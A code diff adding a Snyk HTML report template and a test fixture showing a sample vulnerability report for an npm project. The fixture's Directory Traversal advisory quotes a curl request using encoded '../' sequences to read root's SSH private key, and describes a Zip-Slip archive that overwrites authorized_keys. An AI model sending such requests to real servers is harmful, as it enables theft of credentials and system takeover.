+    <div class="card-header-main">
+      <div class="severity-icon" style="background:{{ severityColor $severity }}">{{ severityLetter $severity }}</div>
+      <h3>{{ $issue.GetTitle }}</h3>
+      {{- $ignoreDetails := $issue.GetIgnoreDetails }}
+      {{- if $ignoreDetails }}
+      {{- $status := $ignoreDetails.GetStatus }}
+      {{- if eq $status "ignored" }}
+      <span class="ignored-badge">Ignored</span>
+      {{- else if eq $status "pending_ignore_approval" }}
+      <span class="ignored-badge">Pending Ignore</span>
+      {{- end }}
+      {{- end }}
+    </div>
+    <ul class="card-meta">
+      {{- if not (hasPrefix $issue.GetID "UNDEFINED-") }}
+      <li class="card-meta-item">{{ $issue.GetID }}</li>
+      {{- end }}
+      {{- $cwes := $issue.GetCWEs }}
+      {{- if $cwes }}
+      <li class="card-meta-item">{{ range $i, $cwe := $cwes }}{{ if $i }}, {{ end }}{{ $cwe }}{{ end }}</li>
+      {{- end }}
+      <li class="card-meta-item">{{ convertTypeToIssueName $findingType }}</li>
+      {{- $reachability := $issue.GetReachability }}
+      {{- if and $reachability (ne $findingType "license") }}
+      {{- if eq $reachability.Reachability "function" }}
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+      {{- else if eq $reachability.Reachability "no_info" }}
+      <li class="card-meta-item">No Path Found</li>
+      {{- end }}
+      {{- end }}
+    </ul>
+  </div>
+  {{- if $hasTabs }}
+  <div class="card-tab-bar">
+    <label for="tab-df-{{ $issueID }}" class="card-tab-label">Data Flow</label>
+    <label for="tab-fa-{{ $issueID }}" class="card-tab-label">Fix Analysis</label>
+  </div>
+  {{- end }}
+  <div class="card-section">
+    {{- $componentName := getIssueMetadata $issue "component-name" }}
+    {{- $componentVersion := getIssueMetadata $issue "component-version" }}
+    {{- if $componentName }}
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> {{ $componentName }}{{- if $componentVersion }}@{{ $componentVersion }}{{ end }}</div>
+    {{- end }}
+    {{- $depPaths := getIssueMetadata $issue "dependency-paths" }}
+    {{- if $depPaths }}
+    {{- if gt (len $depPaths) 0 }}
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      {{- range $i, $path := $depPaths }}
+      {{- if eq $i 0 }}
+      <div class="dep-path">
+        {{- range $idx, $pkg := $path }}{{ if $idx }} &#x203A; {{ end }}{{ $pkg.Name }}@{{ $pkg.Version }}{{ end -}}
+      </div>
+      {{- end }}
+      {{- end }}
+      {{- if gt (len $depPaths) 1 }}
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show {{ sub (len $depPaths) 1 }} more path{{ if gt (len $depPaths) 2 }}s{{ end }}</span><span class="toggle-less">Show less</span></summary>
+        {{- range $i, $path := $depPaths }}
+        {{- if gt $i 0 }}
+        <div class="dep-path">
+          {{- range $idx, $pkg := $path }}{{ if $idx }} &#x203A; {{ end }}{{ $pkg.Name }}@{{ $pkg.Version }}{{ end -}}
+        </div>
+        {{- end }}
+        {{- end }}
+      </details>
+      {{- end }}
+    </div>
+    {{- end }}
+    {{- end }}
+    {{- $description := $issue.GetDescription }}
+    {{- $extra := getFindingExtraFromIssue $issue $testResult }}
+    {{- if $extra }}{{- if $extra.MessageText }}{{- $description = $extra.MessageText }}{{- end }}{{- end }}
+    {{- if $description }}
+    {{- if $extra }}{{- $description = resolveMessageArgs $description $extra.Arguments }}{{- end }}
+    <div class="issue-summary severity--{{ $severity }}">
+      <div class="issue-description">{{ markdownToHTML $description }}</div>
+      {{- range $location := $issue.GetSourceLocations }}
+      {{- if $location }}
+      <div class="file-location">Found in: <strong>{{ $location.FilePath }}, line {{ $location.FromLine }}{{- if $location.ToLine }}{{ if ne (int $location.ToLine) $location.FromLine }} to {{ $location.ToLine }}{{ end }}{{ end }}</strong></div>
+      {{- end }}
+      {{- end }}
+    </div>
+    {{- else }}
+    {{- range $location := $issue.GetSourceLocations }}
+    {{- if $location }}
+    <div class="card-detail"><span class="detail-label">Path:</span> {{ $location.FilePath }}, line {{ $location.FromLine }}{{- if $location.ToLine }}{{ if ne (int $location.ToLine) $location.FromLine }} to {{ $location.ToLine }}{{ end }}{{ end }}</div>
+    {{- end }}
+    {{- end }}
+    {{- end }}
+    {{- if or (eq $findingType "sca") (eq $findingType "license") }}
+    <div class="vuln-link"><a href="https://snyk.io/vuln/{{ $issue.GetID }}" target="_blank" rel="noopener noreferrer">More about this {{ if eq $findingType "license" }}license issue{{ else }}vulnerability{{ end }}</a></div>
+    {{- end }}
+    {{- if $hasDataFlow }}
+    <div class="dataflow">
+      {{- if not $hasTabs }}
+      <h4 class="dataflow__heading"><span class="heading-char">&#x21E3;</span> Data Flow</h4>
+      {{- end }}
+      {{- range $flow := $flows }}
+      {{- if $flow.Flow }}
+      {{- $lastFile := "" }}
+      {{- $lastIdx := sub (len $flow.Flow) 1 }}
+      {{- range $i, $region := $flow.Flow }}
+      {{- if ne $region.FilePath $lastFile }}
+      <div class="dataflow__filename">{{ $region.FilePath }}</div>
+      {{- $lastFile = $region.FilePath }}
+      {{- end }}
+      <div class="dataflow__item">
+        <span class="dataflow__step">{{ $i }}</span>
+        <span class="dataflow__lineno" title="line{{ if $region.FromColumn }}:column{{ end }}">{{ $region.FromLine }}{{ if $region.FromColumn }}:{{ $region.FromColumn }}{{ end }}</span>
+        {{- $parts := readSourceLineMarked $region.FilePath $region.FromLine $region.FromColumn $region.ToColumn }}
+        <span class="dataflow__code">
+          {{- if index3 $parts 1 -}}
+          <span class="dataflow__codeprefix">{{ index3 $parts 0 }}</span><span class="marker">{{ index3 $parts 1 }}</span>{{- if index3 $parts 2 }}<span class="dataflow__codesuffix">{{ index3 $parts 2 }}</span>{{- end }}
+          {{- else -}}
+          {{ index3 $parts 0 }}
+          {{- end -}}
+        </span>
+        {{- if eq $i 0 }}
+        <span class="dataflow__badge" title="Source — where tainted data originates">Source</span>
+        {{- end }}
+        {{- if eq $i $lastIdx }}
+        <span class="dataflow__badge" title="Sink — where tainted data is consumed">Sink</span>
+        {{- end }}
+      </div>
+      {{- end }}
+      {{- end }}
+      {{- end }}
+    </div>
+    {{- end }}
+    {{- if $hasFixAnalysis }}
+    <div class="fix-analysis">
+      {{- if not $hasTabs }}
+      <h4 class="fix-analysis__heading"><span class="heading-char">&#x2713;</span> Fix Analysis</h4>
+      {{- end }}
+      <div class="issue-description">{{ markdownToHTML $rule.Help.Markdown }}</div>
+    </div>
+    {{- end }}
+  </div>
+  {{- $ignoreDetails2 := $issue.GetIgnoreDetails }}
+  {{- if $ignoreDetails2 }}
+  <div class="ignore-details">
+    <div class="ignore-detail"><span class="ignore-label">Expiration:</span> {{ if $ignoreDetails2.GetExpiresAt }}{{ $ignoreDetails2.GetExpiresAt.Format "January 02, 2006" }}{{ else }}Does not expire{{ end }}</div>
+    {{- if $ignoreDetails2.GetIgnoreReasonType }}
+    <div class="ignore-detail"><span class="ignore-label">Category:</span> {{ $ignoreDetails2.GetIgnoreReasonType }}</div>
+    {{- end }}
+    {{- if $ignoreDetails2.GetCreatedAt }}
+    <div class="ignore-detail"><span class="ignore-label">Ignored on:</span> {{ $ignoreDetails2.GetCreatedAt.Format "January 02, 2006" }}</div>
+    {{- end }}
+    {{- if $ignoreDetails2.GetIgnoredBy }}
+    {{- if $ignoreDetails2.GetIgnoredBy.Name }}
+    <div class="ignore-detail"><span class="ignore-label">Ignored by:</span> {{ $ignoreDetails2.GetIgnoredBy.Name }}</div>
+    {{- end }}
+    {{- end }}
+    {{- if $ignoreDetails2.GetJustification }}
+    <div class="ignore-detail"><span class="ignore-label">Reason:</span> {{ $ignoreDetails2.GetJustification }}</div>
+    {{- end }}
+  </div>
+  {{- end }}
+{{- end -}}
+
+{{- define "htmlIssueCard" -}}
+<div class="issue-card severity--{{ .Issue.GetEffectiveSeverity }}">
+  {{- template "htmlCardBody" . }}
+</div>
+{{- end -}}
+
+{{- define "htmlIgnoredIssueCard" -}}
+<div class="issue-card severity--{{ .Issue.GetEffectiveSeverity }} ignored">
+  {{- template "htmlCardBody" . }}
+</div>
+{{- end -}}
+
+{{- define "htmlResultSection" -}}
+<section class="result-section">
+  {{- $findingTypes := getFindingTypesFromTestResult . }}
+  {{- range $findingType := $findingTypes }}
+    {{- $typeName := convertTypeToIssueName $findingType }}
+    {{- if eq $typeName (print $findingType) }}{{ continue }}{{ end }}
+    {{- $allIssues := getIssuesFromTestResult $ $findingType }}
+    {{- $summaries := getSummariesFromIssues $allIssues }}
+    {{- $effectiveSummary := index $summaries "effective" }}
+    {{- $ignoredSummary := index $summaries "ignored" }}
+    {{- $openIssues := getSortedIssuesDesc $effectiveSummary }}
+    {{- if gt (len $openIssues) 0 }}
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open {{ $typeName }} Issues ({{ len $openIssues }})</h2></summary>
+      {{- range $issue := $openIssues }}
+      {{ template "htmlIssueCard" dict "Issue" $issue "TestResult" $ }}
+      {{- end }}
+    </details>
+    {{- end }}
+    {{- if eq (getValueFromConfig "include-ignores") "true" }}
+    {{- $ignoredIssues := getSortedIssuesDesc $ignoredSummary }}
+    {{- if gt (len $ignoredIssues) 0 }}
+    <details class="finding-type-section">
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Ignored {{ $typeName }} Issues ({{ len $ignoredIssues }})</h2></summary>
+      {{- range $issue := $ignoredIssues }}
+      {{ template "htmlIgnoredIssueCard" dict "Issue" $issue "TestResult" $ }}
+      {{- end }}
+    </details>
+    {{- end }}
+    {{- end }}
+  {{- end }}
+</section>
+{{- end -}}
+
+{{- define "main" -}}
+<!doctype html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+{{- $allIssues := getIssuesFromMultipleTestResults .TestResults }}
+{{- $allSummaries := getSummariesFromIssues $allIssues }}
+{{- $openSummary := index $allSummaries "effective" }}
+{{- $ignoredSummaryMeta := index $allSummaries "ignored" }}
+<meta name="description" content="{{ $openSummary.Count }} open issues{{- if and (eq (getValueFromConfig "include-ignores") "true") (gt $ignoredSummaryMeta.Count 0) }}, {{ $ignoredSummaryMeta.Count }} ignored{{- end }}.">
+<title>Snyk Test Report</title>
+{{- template "htmlStyle" . }}
+</head>
+<body>
+{{- template "htmlHeader" . }}
+<main>
+{{- range $resultIndex, $result := .TestResults }}
+<div class="container">
+  {{- template "htmlProjectSummary" $result }}
+  {{- template "htmlResultSection" $result }}
+</div>
+{{- end }}
+</main>
+</body>
+</html>
+{{- end -}}

--- a/internal/presenters/testdata/ufm/cli.html
+++ b/internal/presenters/testdata/ufm/cli.html
@@ -1,0 +1,569 @@
+<!doctype html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta name="description" content="9 open issues.">
+<title>Snyk Test Report</title><style>
+*{box-sizing:border-box;margin:0;padding:0}
+html{scrollbar-gutter:stable}
+body{font-family:-apple-system,BlinkMacSystemFont,avenir next,avenir,segoe ui,helvetica neue,helvetica,Ubuntu,roboto,noto,arial,sans-serif;background:#F5F5F5;color:#393842;line-height:1.5;font-size:100%}
+h1,h2,h3,h4,h5,h6{font-weight:500}
+a,a:link,a:visited{color:#4b45a9;text-decoration:none;border-bottom:1px solid #4b45a9}
+a:hover,a:focus,a:active{opacity:.8}
+a[href^="http://"]:after,a[href^="https://"]:after{background-image:linear-gradient(transparent,transparent),url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20112%20109%22%3E%3Cg%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%3Cg%3E%3Cg%3E%3Cpath%20stroke%3D%22%234B45A9%22%20stroke-width%3D%2215%22%20d%3D%22M88.5%2021l-43%2042.5%22%20stroke-linecap%3D%22square%22%2F%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M111.2%200v50L61%200z%22%2F%3E%3C%2Fg%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M66%2015H0v94h94V44L79%2059v35H15V30h36z%22%2F%3E%3C%2Fg%3E%3C%2Fg%3E%3C%2Fsvg%3E");background-repeat:no-repeat;background-size:.75rem;content:"";display:inline-block;height:.75rem;margin-left:.25rem;width:.75rem}
+hr{border:none;margin:1em 0;border-top:1px solid #d3d3d9}
+code{background-color:#EEE;color:#333;padding:0.25em 0.5em;border-radius:0.25em}
+pre{font-size:14px}
+pre code{padding:10px;font-family:monospace;background-color:#393842;border-radius:4px;color:#fff;display:block;white-space:pre-wrap;overflow-x:auto}
+a code{border-radius:.125rem .125rem 0 0;padding-bottom:0;color:#4b45a9}
+.brand,.brand:link,.brand:visited{display:inline-block;border:none}
+.brand::after{background:none !important;width:0 !important;height:0 !important;content:none !important}
+.report-header{background:#030328;color:#fff;padding:20px 0}
+.report-header .header-inner{max-width:71.25rem;margin:0 auto;padding:0 20px}
+.report-header .header-top{display:flex;justify-content:space-between;align-items:flex-start}
+.report-header .brand svg{display:block}
+.report-header .brand:hover{opacity:.8}
+.report-header h1{font-size:24px;font-weight:500;margin:16px 0 12px}
+.report-header .test-meta{text-align:right;font-size:12px;opacity:.75;max-width:500px}
+.report-header .test-meta .timestamp{margin:0 0 6px}
+.report-header .meta-counts{display:flex;flex-wrap:wrap;gap:4px 0}
+.report-header .meta-count{display:inline-block;margin:0 12px 6px 0;padding-right:12px;border-right:2px solid rgba(255,255,255,.3);font-size:14px}
+.report-header .meta-count:last-child{border-right:none;padding-right:0}
+.container{max-width:71.25rem;margin:0 auto;padding:20px}.container + .container{padding-top:8px;margin-top:20px;border-top:1px solid #e8e8ec}
+.project-summary{background:#fff;border:1px solid #d3d3d9;border-left:5px solid #4B45A9;border-radius:0 4px 4px 0;margin-bottom:24px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,.08)}
+.project-summary .summary-meta{padding:14px 20px;display:grid;grid-template-columns:auto 1fr;gap:4px 12px;font-size:14px;color:#393842}
+.project-summary .meta-label{color:#727184;white-space:nowrap}
+.project-summary .meta-value{color:#393842;word-break:break-word}
+.project-summary .summary-counts{padding:14px 20px;border-top:1px solid #e8e8ec;display:grid;grid-template-columns:auto repeat(4,auto);gap:8px 6px;align-items:center}
+.project-summary .summary-counts .summary-label{font-weight:700;font-size:14px;white-space:nowrap;color:#393842}
+.project-summary .summary-counts .summary-label.ignored-label{color:#727184}
+.severity-badge{padding:4px 10px;border-radius:3px;font-size:12px;font-weight:700;color:#fff;display:inline-block;text-align:center;min-width:70px}
+.severity-badge--zero{background:transparent !important;border:1px solid #d3d3d9;color:#a0a0a0}
+.severity-badge--ignored{opacity:.55}
+.finding-type-section{margin-bottom:32px}
+.finding-type-section[open]{border-bottom:2px solid #e0e0e0}
+.finding-type-section summary{cursor:pointer;list-style:none;padding-bottom:8px}
+.finding-type-section summary::-webkit-details-marker{display:none}
+.finding-type-header{font-size:18px;font-weight:600;margin:0;color:#333;display:flex;align-items:center}
+.finding-type-header .chevron{width:1em;height:1em;margin-right:6px;flex-shrink:0;transition:transform .15s ease}
+.finding-type-header .chevron path{fill:#586069}
+.finding-type-section[open] .finding-type-header .chevron{transform:rotate(90deg)}
+.issue-card{background:#fff;border:1px solid #d3d3d9;border-radius:4px;border-top-width:4px;margin-bottom:20px;position:relative;overflow:hidden}
+.issue-card.severity--critical{border-top-color:#AB1A1A}
+.issue-card.severity--high{border-top-color:#CE5019}
+.issue-card.severity--medium{border-top-color:#D68000}
+.issue-card.severity--low{border-top-color:#88879E}
+.issue-card .card-header{padding:24px}
+.issue-card .card-header-main{display:flex;align-items:flex-start}
+.issue-card .severity-icon{flex-shrink:0;width:32px;height:32px;border-radius:4px;margin-right:12px;display:flex;align-items:center;justify-content:center;color:#fff;font-size:14px;font-weight:700}
+.issue-card h3{display:inline;font-size:22px;font-weight:600;color:#393842;vertical-align:top;margin:0}
+.issue-card .card-meta{display:flex;flex-wrap:wrap;align-items:flex-start;margin:10px 0 0;padding:0;list-style:none}
+.issue-card .card-meta-item{display:inline-block;padding-right:8px;border-right:1px solid #eee;margin-right:8px;font-size:12px;color:#727184}
+.issue-card .card-meta-item:last-child{border-right:none;padding-right:0;margin-right:0}
+.issue-card .risk-score{position:absolute;top:24px;right:24px;text-align:right}
+.issue-card .risk-score__label{font-size:11px;font-weight:700;color:#586069;text-transform:uppercase;line-height:1;margin-bottom:3px}
+.issue-card .risk-score__value{font-size:30px;font-weight:600;color:#24292e;line-height:1}
+.issue-card .card-section{padding:24px;border-top:1px solid #d3d3d9;background-color:#faf9fa}
+.issue-card .card-detail{font-size:14px;color:#586069;margin-bottom:8px}
+.issue-card .card-detail .detail-label{font-weight:600;color:#393842}
+.dep-path{margin:2px 0 2px 16px;font-size:13px}
+.dep-paths-toggle{margin:4px 0 0 0;font-size:13px}
+.dep-paths-toggle summary{cursor:pointer;color:#4b45a9;font-size:12px;margin:2px 0 2px 16px;list-style:none}
+.dep-paths-toggle summary::-webkit-details-marker{display:none}
+.dep-paths-toggle summary::before{content:"▸ "}
+.dep-paths-toggle[open] summary::before{content:"▾ "}
+.dep-paths-toggle .toggle-less{display:none}
+.dep-paths-toggle[open] .toggle-more{display:none}
+.dep-paths-toggle[open] .toggle-less{display:inline}
+.issue-card .vuln-link{margin-top:16px;font-size:13px}
+.issue-description{font-size:14px;color:#393842;margin-top:16px;line-height:1.6}
+.issue-description h2{font-size:18px;font-weight:600;margin:16px 0 8px;color:#393842}
+.issue-description h3{font-size:16px;font-weight:600;margin:14px 0 6px;color:#393842}
+.issue-description p{margin:0 0 12px}
+.issue-description ul,.issue-description ol{margin:6px 0 12px 20px}
+.issue-description li{margin:2px 0}
+.issue-description code{background:#eee;color:#333;padding:1px 4px;border-radius:3px;font-size:13px}
+.issue-description pre{margin:8px 0}
+.issue-description pre code{font-size:13px}
+.issue-description hr{border:none;border-top:1px solid #e0e0e0;margin:12px 0}
+.issue-description table{border-collapse:collapse;margin:8px 0;width:100%;border:1px solid #d3d3d9;border-radius:3px}
+.issue-description th,.issue-description td{border:1px solid #d3d3d9;padding:6px 10px;text-align:left;font-size:13px}
+.issue-description th{background:#f5f5f5;font-weight:600}
+.issue-description td{background:#fff}
+.issue-description a{color:#4b45a9}
+.issue-summary{position:relative;padding:16px 24px;border:1px solid #d3d3d9;border-left-width:4px;border-radius:2px;background-color:#fff;color:#393842;word-break:break-word;margin-top:16px}
+.issue-summary.severity--critical{border-left-color:#AB1A1A}
+.issue-summary.severity--high{border-left-color:#CE5019}
+.issue-summary.severity--medium{border-left-color:#D68000}
+.issue-summary.severity--low{border-left-color:#88879E}
+.issue-summary .issue-description{margin-top:0}
+.issue-summary .file-location{margin-top:10px;font-size:13px;color:#727184}
+.issue-summary .file-location + .file-location{margin-top:4px}
+.card-section > .issue-summary:first-child{margin-top:0}
+.issue-summary .issue-description h2{font-size:15px;margin:12px 0 6px}
+.issue-summary .issue-description h3{font-size:14px;margin:10px 0 4px}
+.issue-summary a[href^="http://"]:after,.issue-summary a[href^="https://"]:after{display:none}
+.no-issues{font-size:15px;color:#586069;padding:12px 0}
+.issue-card.ignored{opacity:.75}
+.issue-card.ignored .card-header{background:#faf9fa}
+.ignored-badge{display:inline-block;background:#727184;color:#fff;font-size:11px;font-weight:700;padding:2px 8px;border-radius:3px;margin-left:10px;vertical-align:middle;text-transform:uppercase;letter-spacing:.5px}
+.ignore-details{background:#f0eff4;padding:16px 24px;border-top:1px solid #d3d3d9;font-size:13px;color:#586069}
+.ignore-details .ignore-detail{margin-bottom:4px}
+.ignore-details .ignore-label{font-weight:600;color:#393842;display:inline-block;min-width:100px}
+.ignored-section{margin-top:20px;padding-top:14px;border-top:1px solid #e8e8ec}
+.ignored-section-header{font-size:16px;font-weight:600;margin:0 0 12px;color:#727184}
+.dataflow{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.dataflow__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.dataflow__heading .heading-char{margin-right:6px;font-size:18px}
+.dataflow__filename{padding:6px 12px;border:1px solid #eee;border-radius:4px;margin:12px 0 6px;font-size:13px;color:#393842;background-color:#fff}
+.dataflow__item{display:flex;align-items:center;padding:4px 8px;font-family:monospace;color:#393842;font-size:14px;border:1px solid transparent;border-width:1px 0}
+.dataflow__item:hover{border-color:#eee;background-color:#fff}
+.dataflow__step{flex:0 0 30px;width:30px;text-align:right;color:#727184;font-size:12px}
+.dataflow__lineno{flex:0 0 60px;padding:0 12px 0 8px;text-align:right;color:#727184;font-size:12px}
+.dataflow__code{flex:1;font-family:monospace;font-size:13px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
+.dataflow__code .marker{padding:2px 6px;border-radius:4px;background-color:rgba(0,0,0,.1);white-space:nowrap}
+.dataflow__item:hover .marker{background-color:#ffc905}
+.dataflow__badge{padding:2px 3px;border:1px solid #d3d3d9;border-radius:2px;margin-left:8px;background-color:#f4f4f6;font-size:11px;line-height:1;font-family:sans-serif;text-transform:uppercase;color:#646374}
+.card-tab-radio{display:none}
+.card-tab-bar{display:flex;padding:6px 24px;border-top:1px solid #d3d3d9;background:#f5f5f5;gap:4px}
+.card-tab-label{padding:5px 15px;font-size:14px;cursor:pointer;border-radius:20px;border:1px solid #d3d3d9;background:#fff;transition:all .2s}
+.card-tab-label:hover{color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .dataflow{display:block}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .fix-analysis{display:none}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-tab-bar label[for^="tab-df"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .fix-analysis{display:block}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .dataflow{display:none}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-tab-bar label[for^="tab-fa"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.fix-analysis{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.card-tab-bar ~ .card-section .dataflow{border-top:none;padding-top:0}
+.card-tab-bar ~ .card-section .fix-analysis{border-top:none;padding-top:0}
+.dataflow__filename:first-child{margin-top:0}
+.fix-analysis__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.fix-analysis__heading .heading-char{margin-right:6px;font-size:18px;color:#2a7b3f}
+@media print{.report-header,.card-tab-bar{display:none}.fix-analysis,.dataflow{display:block !important}.issue-card .card-section{background:none}.marker{border:1px solid #555;background:transparent}.project-summary{border-left-color:#000;border-left-width:3px;box-shadow:none}.project-summary .severity-badge{border:1px solid #999;color:#000;background:transparent !important}}
+</style>
+</head>
+<body><header class="report-header">
+  <div class="header-inner">
+    <div class="header-top">
+      <a class="brand" href="https://snyk.io" title="Snyk - Open Source Security" target="_blank" rel="noopener noreferrer">
+        <svg width="68" height="35" viewBox="0 0 68 35" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Snyk logo">
+          <g fill="#fff" fill-rule="evenodd">
+            <path d="M5.732,27.278 C3.445,27.278 1.589,26.885 0,26.124 L0.483,22.472 C2.163,23.296 4.056,23.689 5.643,23.689 C6.801,23.689 7.563,23.295 7.563,22.599 C7.563,20.594 0.333,21.076 0.333,15.839 C0.333,12.491 3.407,10.729 7.259,10.729 C9.179,10.729 11.161,11.249 12.444,11.704 L11.924,15.294 C10.577,14.774 8.747,14.291 7.222,14.291 C6.282,14.291 5.518,14.621 5.518,15.231 C5.518,17.208 12.903,16.815 12.903,21.925 C12.903,25.325 9.877,27.277 5.733,27.277 L5.732,27.278 Z M25.726,26.936 L25.726,17.894 C25.726,15.827 24.811,14.85 23.069,14.85 C22.219,14.85 21.329,15.09 20.719,15.46 L20.719,26.936 L15.352,26.936 L15.352,11.262 L20.602,10.83 L20.474,13.392 L20.652,13.392 C21.784,11.87 23.702,10.716 25.992,10.716 C28.736,10.716 31.112,12.416 31.112,16.436 L31.112,26.936 L25.724,26.936 L25.726,26.936 Z M61.175,26.936 L56.879,19.479 L56.446,19.479 L56.446,26.935 L51.082,26.935 L51.082,8.37 L56.447,0 L56.447,17.323 C57.515,16.017 61.112,11.059 61.112,11.059 L67.732,11.059 L61.454,17.689 L67.949,26.95 L61.175,26.95 L61.175,26.938 L61.175,26.936 Z M44.13,11.11 L41.93,18.262 C41.5,19.606 41.08,22.079 41.08,22.079 C41.08,22.079 40.75,19.516 40.292,18.172 L37.94,11.108 L31.928,11.108 L38.462,26.935 C37.572,29.04 36.199,30.815 34.369,30.815 C34.039,30.815 33.709,30.802 33.389,30.765 L31.255,34.061 C31.928,34.441 33.212,34.835 34.737,34.835 C38.703,34.835 41.359,31.627 43.215,26.885 L49.443,11.108 L44.132,11.108 L44.13,11.11 Z"/>
+          </g>
+        </svg>
+      </a>
+      <div class="test-meta"><p class="timestamp">October 28, 2025 15:42 UTC</p></div>
+    </div>
+    <h1>Snyk Test Report</h1>
+  </div>
+</header>
+<main>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Software Composition Analysis</span>
+    <span class="meta-label">Project path</span><span class="meta-value">test-project</span>
+    <span class="meta-label">Project</span><span class="meta-value">snyk</span>
+    <span class="meta-label">Target file</span><span class="meta-value">package.json (552 dependencies)</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 9</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge" style="background:#CE5019">2 HIGH</span>
+    <span class="severity-badge" style="background:#D68000">6 MEDIUM</span>
+    <span class="severity-badge" style="background:#88879E">1 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Security Issues (9)</h2></summary>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Directory Traversal</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-ASYNC-12239908</li>
+      <li class="card-meta-item">CWE-22</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> async@3.2.4</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-config@5.2.0 &#x203A; async@3.2.4</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 3 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-lockfile-parser@2.3.1 &#x203A; snyk-config@5.2.0 &#x203A; async@3.2.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; snyk-nodejs-lockfile-parser@2.3.1 &#x203A; snyk-config@5.2.0 &#x203A; async@3.2.4</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-nodejs-plugin@1.4.4 &#x203A; snyk-nodejs-lockfile-parser@1.58.19 &#x203A; snyk-config@5.2.0 &#x203A; async@3.2.4</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p>Affected versions of this package are vulnerable to Directory Traversal. Async &lt;= 2.6.4 and &lt;= 3.2.5 are vulnerable to ReDoS (Regular Expression Denial of Service) while parsing function in autoinject function.</p><h2>Details</h2><p>A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with &#34;dot-dot-slash (../)&#34; sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.</p><p>Directory Traversal vulnerabilities can be generally divided into two types:</p><ul><li><strong>Information Disclosure</strong>: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.</li></ul><p><code>st</code> is a module for serving static files on web pages, and contains a <a href="https://snyk.io/vuln/npm:st:20140206" target="_blank" rel="noopener noreferrer">vulnerability of this type</a>. In our example, we will serve files from the <code>public</code> route.</p><p>If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.</p><pre><code>curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
+</code></pre><p><strong>Note</strong> <code>%2e</code> is the URL encoded version of <code>.</code> (dot).</p><ul><li><strong>Writing arbitrary files</strong>: Allows the attacker to create or replace existing files. This type of vulnerability is also known as <code>Zip-Slip</code>.</li></ul><p>One way to achieve this is by using a malicious <code>zip</code> archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.</p><p>The following is an example of a <code>zip</code> archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in <code>/root/.ssh/</code> overwriting the <code>authorized_keys</code> file:</p><pre><code>2018-04-15 22:04:29 .....           19           19  good.txt
